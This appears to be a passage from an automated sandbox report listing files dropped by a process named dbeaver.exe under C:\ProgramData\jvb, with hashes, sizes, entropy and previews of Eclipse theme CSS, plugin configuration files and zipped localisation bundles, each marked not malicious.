      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2017 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. * Lars Vogel <Lars.Vogel@gmail.com> - Bug 420836. * Patrik Suzzi <psuzzi@gmail.com> - Bug 497591, 501250, 512385. * Ingo Mohr <tellastory73@gmail.com> - Bug 566842. *******************************************************************************/..@import url("platform:/plugin/org.eclipse.ui.themes/css/e4_basestyle.css");..ColorDefinition#org-eclipse-ui-workbench-ACTIVE_UNSELECTED_TABS_COLOR_START {..color: rgb(255, 255, 255);.}..ColorDefinition#org-eclipse-ui-workbench-ACTIVE_UNSELECTED_TABS_COLOR_END {..c
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2097
      Entropy (8bit):5.4497201955738825
      Encrypted:false
      SSDEEP:
      MD5:0AC628F0D0F31E7B017B2F1FDB3F432D
      SHA1:500B788114E84ACCC03C2681F1856155D82CE41E
      SHA-256:0017B84C1E0B992CFB33ECBEF9038740C9AF534D64E280CC2F18DF5E62BDD374
      SHA-512:17BEB4410054AD5DF5AB91A1188398C4E6E64226570B4D0DDDD17A60D7800B8699034131B06865012DD9ED545766AEDF06889225D3E814C949444ED49B30118D
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2020 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. * Lars Vogel <Lars.Vogel@gmail.com> - Bug 420836. * Frank Appel <fappel@codeaffine.com> - Bug 325937. * Patrik Suzzi <psuzzi@gmail.com> - Bug 501250. * Pierre-Yves B. <pyvesdev@gmail.com> - Bug 551462, bug 563079. *******************************************************************************/..@import url("platform:/plugin/org.eclipse.ui.themes/css/e4_basestyle.css");..ColorDefinition#org-eclipse-ui-workbench-ACTIVE_UNSELECTED_TABS_COLOR_START {..color: #F2F2F2;.}..ColorDefinition#org-eclipse-ui-workb
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):875
      Entropy (8bit):4.871418664357457
      Encrypted:false
      SSDEEP:
      MD5:CD34FC465075B6730F5C3035C3E7D9F4
      SHA1:A35647E66EE83FCEDDB5E9225D568D0A4BD2E457
      SHA-256:F81B1D7302ACE8A022DC9CC4753D23DD77690535F414A581D92CB5A48D04D306
      SHA-512:D0039D988B7EB4A29636637D8F650EDEC21A50EFC50229BAA4BF112BCB4FCFC1895F7901A080216091EE2C5152872E0EC37EDF94D0935FD073E0BC69093F79FE
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2014, 2022 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. *******************************************************************************/. . @import url("platform:/plugin/org.eclipse.ui.themes/css/e4_classic.css");..CTabItem:selected {. .color: '#org-eclipse-ui-workbench-INACTIVE_TAB_TEXT_COLOR';.}...MPartStack.active > CTabItem:selected {..color: '#org-eclipse-ui-workbench-ACTIVE_TAB_TEXT_COLOR';.}...MPart Composite.{. background-color: #000000;.}
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):831
      Entropy (8bit):4.742528494154137
      Encrypted:false
      SSDEEP:
      MD5:EB82F4640E5589249FCCCB9AF93D2C66
      SHA1:81EE55E34AAE93EC42EAD65015135C71CD452F59
      SHA-256:01D48260F8676A3593AEDB0EE900C8E06AC0F01E50940FE9BD3170FE1EE52781
      SHA-512:55A40A53035C220F226FB7C8C6E3C4FC8C2D2756018F8B869FF5A03F5F7B370B07F87EC2E8B534AE91400CFBBAC8C88B01DD47B85044D59395E8A0D93A457511
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2020 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. * Lars Vogel <Lars.Vogel@gmail.com> - Bug 420836. *******************************************************************************/.../* ################################ CSS related to drag and drop ########################## */...DragFeedback {..background-color: COLOR-WIDGET-NORMAL-SHADOW;.}...ModifiedDragFeedback {..background-color: #A0A000;.}..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1971
      Entropy (8bit):5.139560171238305
      Encrypted:false
      SSDEEP:
      MD5:A37C79F97F1B5F7C5F9656393357118C
      SHA1:B321949AC764289834B626EDF03D8065E20F6A17
      SHA-256:4EC6E5D920FE2A281922051A1E09CC2A2043086E4009BF59B61F1CF9062E9901
      SHA-512:7941BC8DBF8BB9E22A29BCEC7F8964750AC30F1D43968FFAA1CD8C4BF7FEB3A87BB478E9F7FAB4F504723C58CDE3ED47C2EBF3E4C6A038DCE73A97D188DE3C4E
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2020 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. * Lars Vogel <Lars.Vogel@gmail.com> - Bug 420836. *******************************************************************************/...Form, FormHeading {..background-color: #ffffff;..background: #ffffff;..color: #505050;.}..Form {../* Bug 465148: Additional styling for the Form */..text-background-color: #ffffff;...tb-toggle-hover-color: #505050;..tb-toggle-color: #505050;..h-hover-full-color: #505050;..h-hover-light-color: #505050;..h-bottom-keyline-2-color: #eaeaea;..h-bottom-keyline-1-color: #eaeaea;.}...Section
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):5217
      Entropy (8bit):5.489403401363775
      Encrypted:false
      SSDEEP:
      MD5:E06807579079EC438FCE0393BC898C6E
      SHA1:7BDB5BFEB5BACFD8407F8154418E375ACD7021C3
      SHA-256:3B0D83F1E2A0C8DC489B8A69266C436EBEB7A9FB00216E2C638E3FDE67500B8E
      SHA-512:39FA5C02420642019088F781BABD4DC170E6BD6AE6CDEE07B2645366BC357F699815D58B8E2719497C6DB7548865FB9474017171F7A71879BF95B7A49314C517
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2020 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. * Lars Vogel <Lars.Vogel@gmail.com> - Bug 420836. *******************************************************************************/../* ColorDefinitions for the light theme for the Eclipse IDE.*.* ThemeExtensions and ColorDefinition are mapped to the Colors and Fonts preference.* dialog in the IDE.*/../* New ColorDefinitions for the E4 default theme */ .ThemesExtension { color-definition: ..'#org-eclipse-ui-workbench-INACTIVE_UNSELECTED_TABS_COLOR_START', ..'#org-eclipse-ui-workbench-INACTIVE_UNSELECTED_TABS_COLOR
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):860
      Entropy (8bit):4.76312400589983
      Encrypted:false
      SSDEEP:
      MD5:9A72D17F4CCC37A09BA918116EF8AAC9
      SHA1:706ADE99C03EBC44D9694ACB0CFC74A7E16951CE
      SHA-256:74F89C3C86998A89598F91D838B4EF1FE553AA46218B963E7B66BC350E310AA2
      SHA-512:BAE2F05A4F2ABC2A191C574514C70273CF4A8FA0AB90233315AE638C469C9F32448571906292616424EE84FA761B5BE7BE91BE7AEC593E9F5D08E9FEBC469CB3
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2020 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. * Lars Vogel <Lars.Vogel@gmail.com> - Bug 420836. *******************************************************************************/.../* ################################ CSS for .MParts ########################## */...MPart.busy {..font-style: italic;.}...MPart.highlighted {..font-weight: bold;.}...MPartStack, .MPart {..font-family: '#org-eclipse-ui-workbench-TAB_TEXT_FONT';.}.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):3053
      Entropy (8bit):5.465499506696969
      Encrypted:false
      SSDEEP:
      MD5:62D7AE8800A48889ACF54DDAE998F1EC
      SHA1:1863F628EF2B9431BC37916EBD26C37DF762EB44
      SHA-256:72E626A2C01BED2C1AD1F12871D0D99FCD16E4865F4A931AA8D9E07A7F55AEF8
      SHA-512:7E8F727CF49CC173BFF025B5E841D216FCEB04408C572E697207C98E0DF8332B3C7641FB0047ADD399FDC3AEA5FC9472D186453B1FB3029D65D3FAC32E0C123D
      Malicious:false
      Reputation:unknown
      Preview:/*******************************************************************************. * Copyright (c) 2010, 2020 IBM Corporation and others.. *. * This program and the accompanying materials. * are made available under the terms of the Eclipse Public License 2.0. * which accompanies this distribution, and is available at. * https://www.eclipse.org/legal/epl-2.0/. *. * SPDX-License-Identifier: EPL-2.0. *. * Contributors:. * IBM Corporation - initial API and implementation. * Lars Vogel <Lars.Vogel@gmail.com> - Bug 420836. *******************************************************************************/.../* ################################ CSS for Tabs ########################## */..#org-eclipse-ui-editorss {..swt-tab-height: 8px;.}...MPartStack {..swt-tab-renderer: url('bundleclass://org.eclipse.e4.ui.workbench.renderers.swt/org.eclipse.e4.ui.workbench.renderers.swt.CTabRendering');..swt-selected-tab-fill: '#org-eclipse-ui-workbench-INACTIVE_TAB_BG_START' '#org-eclipse-ui-workbench-
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2584
      Entropy (8bit):5.283304013479997
      Encrypted:false
      SSDEEP:
      MD5:EEF001704502C00A2A11A50535F6FC87
      SHA1:A55C996D84E2D72BE645F93C102C576415A2001D
      SHA-256:040D9ED6E6F292316D2CBE98279732EDB675CEF4C57286386CA6B2F7EC46E928
      SHA-512:FF4D7B865C298B2D208B752F50DA800E93B8D6ADE1C3A8D6407F870A15E38C79AB8396A498A9EE37ABBFEDFBE00F1E2F7ADCC06E7FC7561CE0AED5B54F2EBAC3
      Malicious:false
      Reputation:unknown
      Preview:###############################################################################.# Copyright (c) 2013, 2015 vogella GmbH and others..#.# This program and the accompanying materials.# are made available under the terms of the Eclipse Public License 2.0.# which accompanies this distribution, and is available at.# https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.#.# Contributors:.# Lars Vogel <Lars.Vogel@gmail.com> - initial API and implementation.# Simon Scholz <simon.scholz@vogella.com> - Bug 459578.###############################################################################.Plugin.name = Eclipse SDK Themes.Plugin.providerName = Eclipse.org..theme.classic = Classic.theme.gtk = Light.theme.mac = Light.theme.win = Light.theme.dark = Dark.theme.high-contrast = High Contrast..#New theme element definitions.DARK_BACKGROUND=Dark Background Color.DARK_FOREGROUND=Dark Foreground Color.INACTIVE_UNSELECTED_TABS_COLOR_START=Inactive, unselected part color begin
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):2113
      Entropy (8bit):4.439992315297402
      Encrypted:false
      SSDEEP:
      MD5:AAA946ADD67E91A68CDED9B8EF983F4E
      SHA1:02DECA263D242771B7CF3B1E12F06EF15504208F
      SHA-256:466626B78865B15BA0ACBDD5FE4BA969AEED12F520C60B61CBFB2FBE75150521
      SHA-512:455A7E0CAC597C35FD9457CA787AF272C14600E9DE1CFA151EC7E31352F9E5DFD70C24D009C8008D061D10E99DD64EBA1AFF4BD64D254CEA834399A4AE12A0AF
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<?eclipse version="3.4"?>.<plugin>. <extension. point="org.eclipse.e4.ui.css.swt.theme">. <theme. basestylesheeturi="css/e4_classic.css". id="org.eclipse.e4.ui.css.theme.e4_classic". label="%theme.classic">. </theme>. <theme. basestylesheeturi="css/e4-dark_linux.css". id="org.eclipse.e4.ui.css.theme.e4_dark". label="%theme.dark". os="linux">. </theme>. <theme. basestylesheeturi="css/e4-dark_win.css". id="org.eclipse.e4.ui.css.theme.e4_dark". label="%theme.dark". os="win32">. </theme>. <theme. basestylesheeturi="css/e4-dark_mac1013.css". id="org.eclipse.e4.ui.css.theme.e4_dark". label="%theme.dark". os="macosx". os_version="10.11,10.12,10.13">. </theme>. <theme. basestylesheeturi="css/e4-dark_mac.css". id="org.eclipse.e4.ui.css.theme.e4_dark". label="%theme.dark".
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):19234
      Entropy (8bit):7.78933868434654
      Encrypted:false
      SSDEEP:
      MD5:8D5DCB4DCF744103BC18D2E8CE22E0E1
      SHA1:8E185B8487BECC4DCD36A7241BFEA4C9FBC1CC68
      SHA-256:A6A9A46BF695B1BD63EE5C82AF81B4F45E3BB3E296045883022843FC76F58635
      SHA-512:5054BE9FF5FDF8218B7EBA29D58FBFA99D3BCF1B1544BDAA29697EDD1C580DBCEB0DB201A2B0A9D919113F4B8CD51E1C902BF0E0888C07E53AB8AAECC9D77F6D
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_ru.properties.O... ...+H<K..4.O^../.n)I.....7]L...2.&3;.]..N.10.....z..Sb...3..l....\t.&.....n..3..p./...V..+V..@...L.......=....gO./..9.nF..G....y.b..[.....-.m>...}.?-%15dtCb-..q... ....7PK............PK........k.cX............8...org/eclipse/ui/internal/views/log/messages_ru.properties.Z[o.6.~..:...pmYN....$.V.i.&X_...D.DdQ.h'..>I...-.M..%...x..9./.....+g.v.,Z;..T".K%..W'..+...~=eS.....8.=..~.^.~.,...%.$.o.../B.Et....7L....~........_\g.u._.Aq........U..`.....xAn.W'....-.4..#k.....>.`..Z..v.........p..c 1...w.....su.+..f....nXZ...y..{....RA...m.i.'.....Z!t.!...8.z3......_.........z...{y..%....r.M.<M...w.......5.Q.Z..oEt....k|N/..K..L.z.....C.....V.?.b..h..../lb...Q.&J.P....D..Ya.........Z.....l..b..)..\....+.......e...Aie;.<..V.j%I.f.a....&NE.j..@..^.i...G3.Y.c{..>.h.....7csH...2..X...Nk.h..A..D.xb.C..].dP3...J..... ..-.....u...S3..-..kd9F...H..,i..M....-...&.H.X....:.w.&.+.....$....1....w..:CUBF.%
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):179249
      Entropy (8bit):7.872970066288175
      Encrypted:false
      SSDEEP:
      MD5:12A40E591C7C82C1F013E62AA5D1F753
      SHA1:2F4C3ED2ADC5DC2307C6864A936491FDAB83B906
      SHA-256:E71C67B4C153102764CE0E79F450C3AC4BC1A4A061D485A4F5108477C8CB18A1
      SHA-512:97324A4DC0265C744CF04BCB87A1239B12326A7BDE85A9F4FBA64D9427776A7AAD817295AF8976EE5DDFA095D8BBEA5DF296B417AD98AA8EF59058F83599A35B
      Malicious:false
      Reputation:unknown
      Preview:PK..........YW................META-INF/MANIFEST.MF.{Ws.F.....\..N.]!.u.. @D.....p!...?h.......H"..g....=#....o....i....z....i|............Q<.......~.i...Q..z..0..Y.e.G......u.s...)._..s.Y.~..l.'.......i...}...6.....~.....Y8.......0..0..Z~~..v.x...y....o.;........)...S5..{~...._.q.......v...j...s.7..<......C.`......>.......A....v~.8.zZv.?..5~[f}...e.....O;...E}i..k...O.L..?..W.q}.y.e>/.....>..../..U..;....b........A..[g?.......n.^.*....'v...x.....M.q...>.M.lt..._.|{Y..Ty.~..9-..g.].$....?.}W..s..Rz.w._3.e._.~..q}..../\....u.Oa.}...j?...w.;.e...>V...e..`Y..={.Y..V.]../_t..k.......E..]..W.!.M.m...N.~w\..1....A(..].p0....sI..).$H......."u....$...EP..v.,../<=U."....a.....%^|.0".\......P.........@.]..Vn.^nD....|..)..g.Gu.fP \[D..F~H0.D..:..V..S..._f\..M.@...,...-`.. ..e..+D>.....tlfm.H..."..cB.s6.....t...4..........+....k0.c.f.+'S.+..,.Y...v....U.A].o2>...~.MS6_7.....&9k:4u._.t.b-|......Plo.?I.Yy..37[@.2..EV;.V..fu..J..Oq..%....M
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):12007
      Entropy (8bit):7.299223038776417
      Encrypted:false
      SSDEEP:
      MD5:A8577E1ECDD060D4A52A05210AB23967
      SHA1:146CC6C6252F6C0D0262922721192CFD79EA735D
      SHA-256:54398E621649FFC77BDDCB182ED44B0D2317523CF184BC4FB1AA521E154E19D8
      SHA-512:D87F5A62C0E1311D7DE959E339F7351B4AB234334F6A655AD8E737A091C2DDB91F391283F3F7799DF02C70E1612A5E17D7C545211BFE4FB1BC6ADC551A181C86
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_zh.propertiesm...0.....tW......-.:.$...x........9'.9...fb2.E........ze+.f".).)$L.e._..0..7q...nC<...".Gd/.m...y.J....p.1.........r.........t.d.=.y{...z.PK..]..A........PK........k.cX............?...org/eclipse/ui/internal/views/properties/messages_zh.properties.S..0...+...l..-.dQr.:....A.Q.@..-...........yt...........B,..^4.X.&tV..w......Bh?..RHpsP.=.}.[D+.`.;..6.....U..f.y..T...e...d5...w...'>Zy7.++..P..zO........v.{DF4..-t.p.+y..9...........*..js.NR.$..N..'..x''.b]..D\h.w.5BU.D..x.g..R=......o..z...Z......K....x...#^0~.#.GL'...uk!cX...3...1.U......4eN.B..8o..8h...4.......Q.0*h*:I.*.H\...-.I.=.....H......X.........W.Y..z.+.....F.t......6..`..YE.. ...Y.Lej.0.$.K ..g.W.C...,o.y.2.|...V;iGKdh[.*M.D|...../PK...y....../...PK........k.cX............C...org/eclipse/ui/internal/views/contentoutline/messages_zh.properties-.A.. .@.}OA.".J..<@/@..JB. ,.}........3.u+..k.I..K.....'9..V..h[k,..........6.-..%......KW9..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):9274
      Entropy (8bit):7.280184281201689
      Encrypted:false
      SSDEEP:
      MD5:F76D4E5433B6290B2FFBD79A46ADDBFF
      SHA1:D26117094D05A2CB318875A039B4BD18C8414716
      SHA-256:D304D7BA20C94C622C16202FFC9A94A72DF335C82DC94C49FD5FB8D9E832D3CF
      SHA-512:AE3104C96994CDE39B0D0C3A6C65D66E823E1079A4E7F66F7C194A3E4C8DBB1FB2AC9D17BBA9CB6E4FC3A7810A84A3AF80F778140CEE527BAE3B1D92084B2B88
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_it.properties.....0.Ew..R....u...:uI..K!..S.__@...:.......>.Lm'`f...N.. ...""t"a..F...kK!...Ii...r...BQ4.....u.2..2.u..>...F..iu.qT8.>.09NRzr.R.Y...L..!|..zgmb^m....k!...../..PK....S.....$...PK........k.cX............Y...org/eclipse/ui/internal/views/properties/tabbed/l10n/TabbedPropertyMessages_it.propertiesu.AK.A.........v.*=.EXD....>...d....;..Y..2.$.{..=J......i..HA.).......m...j..P!..2*.~.xG0.....S.h/........O.A..P.....%.YA.H...K_.s......d3..:......]...zQ>.=.W.....=g.}..~.7.5..'%...G.....i.....L"...g..,.M.3{.@A...<./?...5..s..m.k......u....a...F}2.%.u...I.._PK...=#.........PK........k.cX................plugin_es.properties..1..0.........J..^P.\.....\H.`.......{....s.....0c.`9J.f......&.tj[...".|*.8.m3.e.QE.I.}..G.2'O...M....t....d`.Em3.R...9.........=|.."W..9......#oPK..pTR........PK........k.cX............Y...org/eclipse/ui/internal/views/properties/tabbed/l10n/TabbedPropertyMessages_es.properties..AO.0.....K\.n.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):113236
      Entropy (8bit):7.846779380653437
      Encrypted:false
      SSDEEP:
      MD5:C29F7E4B73550A13D1E669C744026A00
      SHA1:103BDAF5718118BFF9F79555BFCF43E019097937
      SHA-256:6A22B36C974407E5D508A763814DDB034313EC76354A1A7BD2EA0AB262652AEC
      SHA-512:0EF96D98E65589BDE44EFDA7FE60DA15E0C6EE2D4358BF116F014379BC38BBAD4B68D90F2E24C5E9DFC94563ABDC3B3746306D147F0059FC188152408C13BF48
      Malicious:false
      Reputation:unknown
      Preview:PK........H..V................META-INF/MANIFEST.MF.ZYs.Z.}OU.C*u..K..H.$.... .@B......$f....I.\[.#']..8..... .i...........r...@....s...>If..ODa.A..O.[..bQ..s.;...{xlz..:1.....!r....L...R.....t..[j.XY...K...v..%....&.my..Y..*..meZ.p..A...6.Z}......}r....|.......70..?-L..xD5....(V?..3...Y...W~.@wyVT7.iG...u.V.H.."...a....W....7e..e.C.......#p....A.u....An...-.~.$.KF5xGyI......n.....6.X...y0....Y.._...6......Ln'....[....._.....V..U........xN...Y..2xE.[.YgI/H.....uZ..x...Q. .g.z~..s.<yz...9b>?}h.t.\...&tM.Y...g.......v}.):m."K..Vw.x.1U..Q...!...)s....m.a..57jV.6.... .Ay....;/......;....kkPG.}.|..fu....%.}.v.ux.KnV.....]Bo.u....T.....GBBf.....'A.t..ctb..9.Mg.5.[S..-...m.tf...v......~(.;v.........@K..d...[;6.....#n..~C....w..f.....G.].Ja,S.D\...[.LN.37Lk...>....o.$~*qks.~3..^.."yd......6./:.D\I.i....o.....Y)....K.t\.!....'..0....H.'jL.d......./...# .....Q...*..^..r{.:......HK.I8;iD.rn.qR.SP.....{.*...~......v..UV(.*.n...).,X.....p.;...7.....|......+
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):110116
      Entropy (8bit):7.8493656215853465
      Encrypted:false
      SSDEEP:
      MD5:F69311831334EB65A41C355EE10BBD54
      SHA1:1697E6F0219B63C627BCD3A231D296CC84ED88B5
      SHA-256:7AEAB17A049AD269E0CC79764AE357FEAF7C800313EEB44DC0923279A6FBF35A
      SHA-512:FA6D1EC079238546F83378FD9D84F907160D6BA8CAF179747DFD3A32224EAAC07EF11CA7469FE88BD95F1AA18778968C4BEC7A8E0A32094434BDFDF94D6436FC
      Malicious:false
      Reputation:unknown
      Preview:PK...........W................META-INF/MANIFEST.MF.Y...}.......t......1.......a3Ob....r..$WU.1.\.d.\.Q.<.A...@UGE...z....[.....b..A.;..`*7.:P}...'.m.zw....%p...k...;.i..Kb.oiv.>}..2m.(.8.~G.2.H#....Fe........... ...j.....~.b.(..w......w(N`.x0....@Ut.... (.k..h7_.z....|_.Us......C...T..>b.w..<o..I..|.................TM.&..y..c].Q.....={Z.)...........f^......../...>.......w...9VnQ....(....w.........=..q..#.;...'.!H..A.........J?[A.+.....G..1...)].......C..y.UE.M...A.;[....i."...S...^./E~J..+wz.V....T wA..C.f.....6MY....8l.).....].._T..&..K...`cz.si7..~..K >~n...G....;.A...'[Y.H.....M..Bp..4..f(m{.....&\.!...........n#..!.G.....A..h..]P...wS.......6#.(.x..3...?CM.`.......1.........c..iJ....h.....4.A.(.....X._..s.&.#.K....Vv.J.E(c:.K),.CM. .*ih.....#k..Y.|..C.".}.9.....Cj(......0.......^...>p{.7....r..k...I.g.f.:.k..F.e....(......n....y...tb....j.(*V(s.OCB..Q.l.,.r....fG8..1.15.....g.......fb......n.8_..<c..].Cz.VQ...#.Aq.ZD.F.U...s
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):256995
      Entropy (8bit):7.83089628970845
      Encrypted:false
      SSDEEP:
      MD5:445D11F13F5501D82A729C40FB9DE583
      SHA1:BFC1AC116FE5D32D9F62EFCDA81B6C897D9FFD6D
      SHA-256:530B884292B3F48F5A2B8A09B1D1D80635046C209E7218BD99C9C4D5FAE1BA18
      SHA-512:B7CC50BCDB154D18A6C46D9C580C088E2A4AD5B1829476DC3412C70C26A1B25BB4572A3BFE1D0DDD5CD762F8F951D400FCD3BFF5F469167BFF2BBED21E9DA82A
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_ko.propertiesm..N.0.E...K.!1.....RR...C2....l.....G3..=.Hs%.y..Ms.f......)..C|..Q.)..mk.A. 8Z#6.....>....<.|'...x)^...4x.t.3......~.q..p+...~..;).l{..uc.....:)...o..\.i=..j...yK~.?.9}..r.-V/t._.v<U.t.eoU_.....^~.PK.. y......Y...PK........k.cX............:...org/eclipse/ui/internal/quickaccess/messages_ko.propertiesmR.N.0.......K.,....U.^.@ .T....q.8E....$l.^..g.2/>......] ..ET]..rV....\..b.w.>...XN.J]785v7;.k5<_.`.l..&.|.X......[.1..=j|.!...H..mS#8}.f....-...z..s..q1.Xa..m.Ud.%.....&0...!.EVx......-Z.|A...#.HE.0...|r{..t.7.Y...d@0O."q........h..."Y..t.u.].....Z..{...dSq:eT.4.Q.....w.1R...@.H...l.4.?......^.P}.Q2.Y.<.].Y.B8..;.3...(.J.1.'xOI.@B.....o.I..'Y7.c..}...[.\.YbY.Oz...4.R+..,.>.PK..1..#........PK........k.cX............@...org/eclipse/ui/internal/themes/ThemeRegistryReader_ko.properties.R=O.0.....X`I..NlP.Ve.1 ....M#.M..!...KQAE ......w..b.SW..A.I..q........t...C..ah....|...u..!j.rq.jj...+6......e.b;.i..B.x;z.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):118733
      Entropy (8bit):7.796738501601824
      Encrypted:false
      SSDEEP:
      MD5:508935564388E5F9ECC2723579CC8DBB
      SHA1:2A57A3F484DD39C00406B16C87C76B8267BA3DDA
      SHA-256:E4233522151E6F82CA5EC35B6EB918094A720D8E2409E1AA84D381CF12CD8C83
      SHA-512:083B4C8CD55AEE3C89832E09A6CCC3C603F4F90274C15A8D4FABE575A53CC12F20A64E2079BBE9EAD76C7A6DE2DC3325F95F996A627F9EEF2315DEA6704FE5D6
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_zh.properties.ZKs....W.*9{(>@2[{.z......d.....23...(k.T.{..A.IQ...d..u../4./....../.u.v....5........_...^....o.>.....%M.?...~..7.m.~.;....%Y...!y>...=..*.<...2.}.#..@W..t..o7..s.+k..].pR..@.z?.]..<N..cLi|u......p....%...^...>.H.h. b(Q.0.*/.....m..w...f.c......&.....i.....t..T.ge.<....'.@.'T..'..+.tX..T.(....+.C...V...j..,...(.Ey.+!.. ..............>...#..e.Y...#|....Kwz....-...cP.qL...ET...a.. gp..$....4t]3.......j.....R.......3..0.Q.Hq.HY.7).fSi."?...A.w..!;..J"..<..1.......w.T&OW(..&..4.v7.6".p....%|J....L?..\.Q..........~T..=J..gE.].~M+@NYT.o(8O..{t.mC.k:.]......|.!.P..H.J...B........O9j... .6...G&..|.v.o.Xi.1.#.2..<.b_R.9....#....8.&..d..[..z.....Tb...,..I9......K.E....a...e.>..:zX.h....A1|..!9...rG.!C%.@..P0$...}e.......W..._ ..{....K."n.*Z.W...e.}{i?v...p.].IR.V....7....F..kt|u...p..'...>...R....U..0T&LN...l.A....2$u.bY..H.kY>....T.P%<..g..-..n.$B.w.(.CZ.%.&...XX.t..)..*.xA.y....}..^5>v.Z..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):710309
      Entropy (8bit):7.908566241368305
      Encrypted:false
      SSDEEP:
      MD5:FA44E803F9811120DAB0DAC16E321553
      SHA1:AEEDB310A0A255C5C86EEBDCF6D7B2CBDA047A2C
      SHA-256:EE40D4BFE16D2579A2A54E51DF99645B6F39052B24A16695D44A1AA4998A8DEE
      SHA-512:8852EE4EB8B33525B87E58084076827D2CDD92E094E46A14A3F6C14C938B8F8A85EA6C7F78D9F683F7AEDD0C0E0EC065F933D2077DAEB2AE34F4F54A89D83D85
      Malicious:false
      Reputation:unknown
